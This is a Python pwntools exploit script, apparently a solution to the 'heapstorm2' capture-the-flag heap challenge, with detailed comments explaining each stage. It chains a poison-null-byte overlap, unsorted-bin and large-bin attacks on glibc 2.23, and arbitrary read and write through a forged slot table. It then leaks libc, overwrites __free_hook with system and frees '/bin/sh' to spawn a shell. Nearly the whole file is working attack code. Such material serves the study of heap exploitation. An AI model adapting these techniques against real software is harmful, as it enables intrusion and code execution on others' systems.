from pwn import *

# Target process and the libc shipped with the challenge. Both are module
# globals read by every helper below (add/update/dele/view/q/pwn).
p = process('./heapstorm2')
libc = ELF('libc.so.6')

# Trace every byte on the wire, and tell pwntools how to open a terminal for
# gdb.attach(). NOTE(review): gnome-terminal has deprecated `-x` in favour of
# `--`; if attach() fails on a newer desktop that is the first thing to change.
context.update(log_level='debug',
               terminal=['gnome-terminal', '-x', 'bash', '-c'])
def q():
    """Attach gdb to the running target and block until Enter is pressed.

    Debug-only convenience; pwn() does not call it. `raw_input` is Python 2,
    which is the interpreter this script otherwise assumes.
    """
    gdb.attach(p)
    # Keep the target parked while the debugger is being driven by hand.
    raw_input('test')
def add(size):
    """Menu option 1: allocate a chunk of `size` bytes.

    The binary chooses the slot index; the caller has to track it. Blocks
    until the 'Allocated' confirmation is seen, so a rejected size hangs here.
    """
    dialogue = (('Command: ', '1'),
                ('Size: ', str(size)))
    for prompt, answer in dialogue:
        p.recvuntil(prompt)
        p.sendline(answer)
    p.recvuntil('Allocated')
def update(idx, size, con):
    """Menu option 2: write `con` into slot `idx`, announcing `size` bytes.

    `con` is sent raw (no newline). Callers pass len(con) as `size` because the
    binary is expected to read exactly that many bytes: a shorter `con` stalls
    the exploit waiting for input, a longer one leaves stray bytes in the pipe.
    """
    dialogue = (('Command: ', '2'),
                ('Index: ', str(idx)),
                ('Size: ', str(size)))
    for prompt, answer in dialogue:
        p.recvuntil(prompt)
        p.sendline(answer)
    p.recvuntil('Content: ')
    p.send(con)
def dele(idx):
    """Menu option 3: free the chunk in slot `idx`.

    Matches only the 'Command' / 'Index' prefixes of the prompts, so it is
    tolerant of trailing punctuation differences in the menu text.
    """
    dialogue = (('Command', '3'),
                ('Index', str(idx)))
    for prompt, answer in dialogue:
        p.recvuntil(prompt)
        p.sendline(answer)
def view(idx):
    """Menu option 4: ask the binary to print the contents of slot `idx`.

    Only sends the request; the caller reads the 'Chunk[N]: ' reply itself,
    which is what pwn() relies on for its leaks.
    """
    dialogue = (('Command', '4'),
                ('Index', str(idx)))
    for prompt, answer in dialogue:
        p.recvuntil(prompt)
        p.sendline(answer)
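def pwn():
    """Run the heapstorm2 exploit end to end and hand over an interactive shell.

    Uses the module-level helpers add/update/dele/view and the globals `p`
    and `libc`. Slot numbers in the comments assume the binary fills the
    lowest free slot, which the later update(4)/update(9) calls also rely on.
    The fixed address 0x13370800 is where this binary presumably keeps its
    bookkeeping (keys, a marker, then a (ptr, size) slot table at +0x20) --
    verify against the disassembly before touching any constant.

    Stages:
      1. build two overlapping-chunk layouts through update()'s off-by-one
         (slot 2 ends up overlapping slot 4, slot 7 overlapping slot 9);
      2. unsorted-bin attack + large-bin attack aimed at 0x133707e0, so that
         add(0x48) returns a fake chunk whose data starts at 0x133707f0;
      3. through that chunk, rewrite the bookkeeping so slot 0 points at the
         slot table itself -> arbitrary read (view) and write (update);
      4. leak a heap pointer and a main_arena pointer, derive libc_base;
      5. __free_hook = system, then free("/bin/sh").

    Fix vs. the original: uses next() and a bytes fill character instead of
    the Python-2-only `.next()` / str fill, so it runs on both Python 2 and 3
    pwntools. Everything else is byte-for-byte the same sequence.
    """
    # --- Stage 1a: first overlap (slot 2 over slot 4) ---
    add(0x108)   # slot 0
    add(0x300)   # slot 1
    add(0x200)   # slot 2
    add(0x130)   # slot 3
    dele(1)
    dele(0)
    add(0x108)   # slot 0 again, directly below the freed 0x310 region
    # 0x108-12 bytes of filler: presumably the binary appends its own 12-byte
    # trailer plus a NUL, and that NUL clips the next chunk's size byte
    # (poison-null-byte). The exact contract lives in the binary, not here.
    update(0, 0x108-12, 'a'*(0x108-12))
    add(0x80)    # slot 1, carved from the clipped region
    add(0x260)   # slot 4
    dele(1)
    dele(2)      # backward consolidation across the clipped size: one big free chunk covering slot 4
    add(0x80)    # slot 1
    add(0x480)   # slot 2, now overlapping slot 4

    # --- Stage 1b: same recipe again (slot 7 over slot 9) ---
    add(0x108)   # slot 5
    add(0x300)   # slot 6
    add(0x200)   # slot 7
    add(0x130)   # slot 8
    dele(6)
    dele(5)
    add(0x108)   # slot 5
    update(5, 0x108-12, 'a'*(0x108-12))
    add(0x90)    # slot 6
    add(0x250)   # slot 9
    dele(6)
    dele(7)
    add(0x90)    # slot 6
    add(0x470)   # slot 7, now overlapping slot 9

    # --- Stage 2: bin setup and pointer corruption through the overlaps ---
    dele(7)      # -> unsorted bin
    dele(2)      # -> unsorted bin
    add(0x480)   # slot 2: sorting the unsorted bin moves slot 7's chunk into the large bin
    dele(2)      # back into the unsorted bin, still overlapped by slot 4
    # Unsorted-bin attack via slot 4: fd = 0, bk = 0x133707e0, so the next
    # unsorted-bin pass writes the bin head to 0x133707f0 (bk + 0x10).
    payload = p64(0) + p64(0x13370800-0x20) + p64(0)*2
    update(4, len(payload), payload)
    # Large-bin attack via slot 9: bk and bk_nextsize are picked so a heap
    # pointer lands at 0x133707f8 and, shifted by 5 bytes, at 0x133707e3 --
    # its 0x55/0x56 high byte then reads as a plausible size field for a fake
    # chunk at 0x133707e0 (glibc 2.23 malloc behaviour assumed throughout).
    payload = (p64(0) + p64(0x13370800-0x20+8) + p64(0)
               + p64(0x13370800-0x20-0x18-5) + p64(0))
    update(9, len(payload), payload)
    add(0x48)    # fires both attacks; returns the fake chunk (data at 0x133707f0) as slot 2

    # --- Stage 3: take over the slot table ---
    # Through slot 2: zero 0x13370800..0x13370810 (presumably the keys the
    # binary masks stored pointers/sizes with), place the 0x13377331 marker at
    # 0x13370810, and make slot 0's pointer (at 0x13370820) point at the
    # table itself.
    payload = p64(0)*4 + p64(0x13377331) + p64(0) + p64(0x13370800+0x20)
    update(2, len(payload), payload)

    # --- Stage 4: leaks ---
    # slot 0 -> the table (size 0x100); slot 1 -> 0x133707e3, where the
    # large-bin attack left a heap pointer. Despite its name, the value read
    # here appears to be a chunk address, not the unsorted-bin head.
    payload = (p64(0x13370800+0x20) + p64(0x100)
               + p64(0x13370800-0x20+3) + p64(0x100))
    update(0, len(payload), payload)
    view(1)
    p.recvuntil('Chunk[1]: ')
    unsortedbin_addr = u64(p.recv(6).ljust(8, b'\x00'))
    log.info('unsortedbin_addr: ' + hex(unsortedbin_addr))
    # Read that chunk's fd (+0x10), which for a binned chunk presumably points
    # into main_arena.
    payload = (p64(0x13370800+0x20) + p64(0x100)
               + p64(unsortedbin_addr+0x10) + p64(0x100))
    update(0, len(payload), payload)
    view(1)
    p.recvuntil('Chunk[1]: ')
    # 0x3C4B20 (main_arena) + 88 (unsorted-bin head) are offsets of one
    # specific glibc 2.23 build -- recompute them for any other libc.so.6.
    libc_base = u64(p.recv(6).ljust(8, b'\x00')) - 0x3C4B20 - 88
    log.info('libc_base: ' + hex(libc_base))
    system = libc_base + libc.symbols['system']
    binsh = libc_base + next(libc.search(b'/bin/sh\x00'))
    free_hook = libc_base + libc.symbols['__free_hook']

    # --- Stage 5: __free_hook -> system, then free("/bin/sh") ---
    # slot 1 -> __free_hook, slot 2 -> "/bin/sh" (both with a generous size).
    payload = (p64(0x13370800+0x20) + p64(0x100)
               + p64(free_hook) + p64(0x100)
               + p64(binsh) + p64(0x100))
    update(0, len(payload), payload)
    update(1, 8, p64(system))   # __free_hook = system
    dele(2)                     # free("/bin/sh") -> system("/bin/sh")
    p.interactive()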
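# Entry-point guard so the helpers can be imported (e.g. into a REPL) without
# firing the exploit. Note the target is still spawned by the module-level
# `p = process(...)` at the top of the file.
if __name__ == '__main__':
    pwn()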